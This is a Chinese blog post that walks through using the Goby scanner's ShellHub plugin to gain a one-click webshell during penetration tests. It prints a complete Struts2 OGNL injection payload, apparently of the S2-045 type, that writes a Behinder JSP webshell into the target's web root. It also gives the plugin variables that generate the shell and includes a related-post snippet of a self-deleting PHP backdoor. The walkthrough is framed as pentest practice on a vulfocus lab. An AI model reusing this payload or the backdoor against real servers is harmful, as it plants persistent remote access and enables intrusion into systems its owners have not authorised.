技术分享 上线利器 - ShellHub 插件初体验_echo md5(42291) unlink(_file_)

最新推荐文章于 2024-08-13 08:35:39 发布
最新推荐文章于 2024-08-13 08:35:39 发布
阅读量268 收藏 9
点赞数 5
分类专栏: 程序员 文章标签: 安全 web安全 网络
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/2301_76224593/article/details/138311414
版权
本文介绍了如何在渗透测试中使用Goby的ShellHub插件自动化获取Webshell,通过CVE_2016_0785漏洞利用示例,展示了如何一键式执行payload。同时强调了系统化学习对于技术提升的重要性,并邀请读者加入技术交流社区。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

在这里插入图片描述

前言: 渗透测试过程中发现存在文件上传漏洞时,我们往往会尝试通过上传木马文件获取一个 webshell。上传的木马文件通常需要一个客户端例如冰蝎和蚁剑进行 shell 的获取及管理,在这一过程中用户需要打开管理工具并填写连接信息如上传文件的 url、连接密码等。然而,Goby 中 ShellHub 的出现可以使这个过程一键优雅的实现,只需点击 webshell 键即可弹出 webshell 控制窗口。

0×01 插件安装

ShellHub 已支持在 Goby 最新版插件扩展模块中一键下载安装。

在这里插入图片描述

下载完 ShellHub 插件后即可在 PoC 页面定义相关的漏洞一键 webshell。

0×02 插件使用

本次选取 cve_2016_0785-Strtus2 远程代码执行漏洞获取 webshell 作为 PoC 演示。
1.在漏洞模块新建 PoC, 填写名称匹配规则和描述等基本信息:
在这里插入图片描述
2.在漏洞扫描检测页面设置 HTTP 请求方法为 POST。
在这里插入图片描述

在 Content-Type 字段中填入本次漏洞利用的 payload,在漏洞测试环节中 name 和 file 变量暂时用不上。

payload:


%{(#nike='multipart/form-data').
(#dm=@ognl.OgnlContext@DEFAULT\_MEMBER\_ACCESS).(#_memberAccess?
(#_memberAccess=#dm):
((#container=#context['com.opensymphony.xwork2.ActionContext.container']).
(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).
(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).
(#req=(@org.apache.struts2.ServletActionContext@getRequest())).
(#path1=#req.getRealPath('/')).(#sb=(new java.lang.StringBuilder(#path1))).
(#path=#sb.append('/{{{name}}}')).(#shell='{{{file}}}').(#file=new java.io.File(#path)).(#fw=new java.io.FileWriter(#file)).(#fw.write(#shell)).
(#fw.flush()).(#fw.close()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getWriter())).
(#ros.print('UPLO')).(#ros.println('AD-OK')).(#ros.flush())}

3.在 Payload 中实现一个功能:打印出 UPLOAD-OK 字符串,作为漏洞是否利用成功的依据。

4.在攻击测试页面中定义 3 个变量,其中前两个变量 name(为随机生成的 8 位冰蝎马前缀 +.jsp 后缀构成冰蝎马相对路径),file 变量表示写入的木马文件内容。payload用上面测试的即可,上述变量会被引用至 payload 中。

变量详情:

name|rand|str|8

//生成8位随机字符

name|name|concat|.jsp

//前面生成的字符加上后缀构成木马相对路径

file|genshell|exp|B:jsp

// file 代表变量名,可随意指定,该变量实际是一个数组,在http请求头中或请求体时,其值为一个形如<?php echo md5(随机值);unlink(\_\_FILE\_\_);?>; exp 代表上传一个 webshell;B:jsp 代表生成冰蝎的 jsp 马,同理还有 G:jspRaw 代表哥斯拉的 raw 类型的 jsp 马
在这里插入图片描述

5.设置漏洞利用成功标识-响应包中含有 UPLOAD-OK 字符串,设置 EXP 返回信息,包含:webshell 地址,webshell 连接密码,webshell 连接工具即可。

6.在 vulfocus.fofa.so 页面下快速启动一个用来测试的漏洞环境。
在这里插入图片描述
在这里插入图片描述

将存在漏洞的 url 导入,进行漏洞扫描和利用测试。

在这里插入图片描述

扫描验证成功后点击 webshell 即可一键获取 webshell。

在这里插入图片描述

网上学习资料一大堆,但如果学到的知识不成体系,遇到问题时只是浅尝辄止,不再深入研究,那么很难做到真正的技术提升。

需要这份系统化资料的朋友,可以点击这里获取

一个人可以走的很快,但一群人才能走的更远!不论你是正从事IT行业的老鸟或是对IT行业感兴趣的新人,都欢迎加入我们的的圈子(技术交流、学习资源、职场吐槽、大厂内推、面试辅导),让我们一起学习成长!

红队内网攻防渗透:内网渗透之内网各种工具平台的使用
HACKONE的博客
04-10 1178
红队内网攻防渗透内网各种工具平台的使用 内网各种工具平台的使用
[网络安全自学篇] 八十一.WHUCTF之WEB类解题思路WP(文件上传漏洞、冰蝎蚁剑、反序列化phar)
杨秀璋的专栏
05-30 1万+
这是作者网络安全自学教程系列,主要是关于安全工具和实践操作的在线笔记,特分享出来与博友们学习,希望您喜欢,一起进步。前文分享了WHUCTF部分题目,包括代码审计、文件包含、过滤绕过、SQL注入。这篇文章将讲解Easy_unserialize解题思路,详细分享文件上传漏洞、冰蝎蚁剑用法、反序列化phar等。第一次参加CTF,还是学到了很多东西,后面几天忙于其他事情,就没再参加。人生路上,要珍惜好每一天与家人陪伴的日子。感谢武汉大学,感谢网安学院,感谢这些大佬和师傅们(尤其出题和解题的老师们)~
shellhubShellHub使团队可以轻松访问防火墙和NAT之后的任何Linux设备
02-03
用于边缘和云计算的集中式SSH。 ••• ShellHub是一种现代SSH服务器,用于通过命令行(使用任何SSH客户端)或基于Web的用户界面远程访问Linux设备,它是sshd的替代产品。 将ShellHub视为用于边缘和云计算的集中式SSH。 可从获得ShellHub的托管版本。 入门 要开始使用ShellHub,建议您遵循ShellHub文档中的《指南》。 贡献 ShellHub是一个开源项目,我们希望收到社区的贡献。 如果您想贡献,请阅读我们的。 获得帮助 欢迎您在我们的提出任何问题,参与讨论并寻求帮助。 执照 ShellHub已获得Apache许可证2.0版的许可。 有关完整的许可证文本,请参阅 。 开发环境设置 首先,您需要为服务生成所需的密钥: $ ./bin/keygen 为开发设置环境: $ echo "SHELLHUB_ENV=development" >> .env.override 启动整个环境: $ ./bin/docker-compose up 避免直接使用docker-compose (除非您知道自己在做什么); 而是使用bin/docker-
技术分享 | 上线利器 - ShellHub 插件初体验
m0_46699477的博客
12-09 2761
前言: 渗透测试过程中发现存在文件上传漏洞时,我们往往会尝试通过上传木马文件获取一个 webshell。上传的木马文件通常需要一个客户端例如冰蝎和蚁剑进行 shell 的获取及管理,在这一过程中用户需要打开管理工具并填写连接信息如上传文件的 url、连接密码等。然而,Goby 中 ShellHub 的出现可以使这个过程一键优雅的实现,只需点击 webshell 键即可弹出 webshell 控制窗口。 0×01 插件安装 ShellHub 已支持在 Goby 最新版插件扩展模块中一键下载安装。 下载完.
掌控边缘与云计算的集中式SSH管理平台:ShellHub
gitblog_00095的博客
05-14 385
掌控边缘与云计算的集中式SSH管理平台:ShellHub shellhub:computer: Get seamless remote access to any Linux device. Centralized SSH for the edge and cloud computing项目地址:https://gitcode.com/gh_mirrors/sh/shellhub ShellHu...
shellhub 部署
水彩橘子
07-01 443
创建完用户和命名空间登录,显示以下。操作系统:龙蜥os 7.9。
使用ShellHub搭建集中式SSH
恋上、小幸福的博客
06-25 1051
ShellHub 是一个现代化的 SSH 服务器,可用于通过命令行(使用 SSH 客户端)或基于 Web 的用户界面远程访问 Linux 设备。通常,当您想通过 SSH 访问本地网络上的远程系统时,您需要知道系统的 IP 地址。但如果您想访问网络外部的系统,则需要进行一些配置,例如获取公共IP地址并根据需要配置路由器。如果设备位于限制 SSH 连接的公司防火墙后面,则更改 VPN/防火墙配置甚至会变得更加困难。ShellHub 通过让您轻松访问 NAT 或防火墙后面的任何 Linux 系统来消除这种困扰。
初识Composer:一个用于PHP依赖管理的利器
# 1. 什么是Composer? ## 1.1 Composer的背景和起源 Composer是一个用于PHP依赖管理的工具。它由Nils Adermann和Jordi Boggiano于... ...## 1.2 Composer的作用和功能 ...通过定义项目所需要的包和版本,在执行`compose
【PHP模板引擎原理】:揭秘自定义模板引擎的核心机制与设计基础
模板引擎作为一种代码生成技术,在现代Web开发中扮演了重要角色,特别是在PHP环境中。本文首先界定了模板引擎的定义及其应用场景,随后详细阐述了模板引擎的工作原理和核心组件,包括模板与数据的分离、解析器、...
Linux常用命令(二)
ldwtxwh的专栏
12-05 1020
locate命令可以在搜寻数据库时快速找到档案,locate为模糊查找,数据库由updatedb程序来更新,updatedb是由cron daemon周期性建立的,locate命令在搜寻数据库时比由整个由硬盘资料来搜寻资料来得快,但较差劲的是locate所找到的档案若是最近才建立或 刚更名的,可能会找不到,在内定值中,updatedb每天会跑一次,可以由修改crontab来更新设定值。(etc/crontab)grep 命令里的匹配模式,就是你想要找出来的数据,可以是普通的文字符号,也可以是正则表达式;
:computer:ShellHub使团队可以轻松访问防火墙和NAT之后的任何Linux设备。-Golang开发
05-26
ShellHub ShellHub是一种现代SSH服务器,用于通过命令行(使用任何SSH客户端)或基于Web的用户界面远程访问Linux设备。 它旨在代替sshd使用。 ShellHub使团队可以轻松地为边缘和云计算使用集中式SSH。 ShellHub托管•文档•贡献•获得帮助ShellHub是现代SSH服务器,可通过命令行(使用任何SSH客户端)或基于Web的用户界面远程访问Linux设备,它是sshd的替代方案。 将ShellHub视为用于边缘和云计算的集中式SSH。 可从https://shellhub.io/获得ShellHub的托管版本。 入门要开始使用ShellHub,建议您
利用PHP脚本在Linux下用md5函数加密字符串的方法
10-24
主要介绍了利用PHP脚本在Linux下用md5函数加密字符串的方法,只需Linux系统中安装过PHP然后在命令行中操作文中示例即可,需要的朋友可以参考下
有了这个网络安全面试题,面试就像开了挂!(附PDF)
lvaolan的博客
02-26 1622
还有兄弟不知道网络安全面试可以提前刷题吗?费时一周整理的160+网络安全面试题,金九银十,做网络安全面试里的显眼包!王岚嵚工程师面试题(附答案),只能帮兄弟们到这儿了!如果你能答对70%,找一个安全工作,问题不大。对于有1-3年工作经验,想要跳槽的朋友来说,也是很好的温习资料!【完整版领取方式在文末!!​​​​内容实在太多,不一一截图了。
插件分享 | ShellHub 让 Goby 打通渗透流程
m0_46699477的博客
11-05 684
前言: 在渗透/HW 中成功拿下一个 webshell 无疑是让人十分激动的,一直以来,Goby 对于一些文件上传类漏洞的 Exp 的利用流程是去尝试获取一个 webshell,webshell 的种类在不受限的情况下默认上传冰蝎马,如果没有问题的话,会打印出 webshell 的 URL,密码,管理的工具,随后用户可以复制这些信息在对应的管理工具中进行连接。我们一直在想,能不能有更加优雅的方式完成上述的流程,就像 Goby 已有的反弹 shell 功能一样,点击一下open shell 按钮就能弹出打到.
ShellHub安装与使用指南
gitblog_00259的博客
08-13 1027
ShellHub安装与使用指南 shellhub:computer: Get seamless remote access to any Linux device. Centralized SSH for the edge and cloud computing项目地址:https://gitcode.com/gh_mirrors/sh/shellhub 目录结构及介绍 ShellHub是一款强...
PHP内存型木马
Mi1k7ea
12-09 8078
基本概念 PHP内存性木马即PHP不死马,一般会删除自身以进程的形式循环创建隐蔽的后门。 通常在AWD Web题中用得较多。 Demo及原理 nodie.php &lt;?php ignore_user_abort(true); set_time_limit(0); unlink(__FILE__); $file = '/var/www/dvwa/.ski12.php'; $...
Laykefu客服系统 任意文件上传漏洞,为什么网络安全要采用Binder作为IPC机制
m0_60607675的博客
04-05 749
2、访问info:name: Laykefu客服系统/admin/users/upavatar.html接口处存在文件上传漏洞 而且当请求头中Cookie中的”user_name“不为空时即可绕过登录系统后台 恶意攻击者可利用此问题 上传后门文件 获取服务器权限metadata:variables:?
开始你的shell脚本编程
shellhub的博客
07-14 2344
原文链接 对于我自己来说,学习新框架或技术的最佳方式是同时获得实践经验,在本文中,你将自己通过编写代码来学习shell脚本的基础知识!本文包含语法,shell脚本的基础知识到中级shell编程,通过这篇文章你可以学习shell的相关知识,并且通过shell来实现Unix/Linux之间的接口 介绍 您可能已经多次遇到过“脚本”这个词,但脚本的的含义是什么意思呢?简单的来说,脚...
C语言switch史上最详细的讲解
热门推荐
shellhub的博客
01-11 13万+
原文链接 https://github.com/shellhub/blog/issues/41 C语言switch史上最详细的讲解 switch语句允许测试变量与值列表的相等性,每个值称之为案例或者case,程序会检查switch后面的值并且与case后面的值比对,如果相等则执行后面的代码或代码块 语法 switch在C语言中的语法如下 switch(expression) { cas...
mq_close 与 mq_unlink之间的关系
最新发布
05-29
### POSIX 消息队列中 `mq_close` 和 `mq_unlink` 的区别与联系 #### 1. `mq_close` 的功能 `mq_close` 函数用于关闭消息队列的描述符。调用此函数后,进程将不再通过该描述符访问消息队列。然而,这并不会删除消息...
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值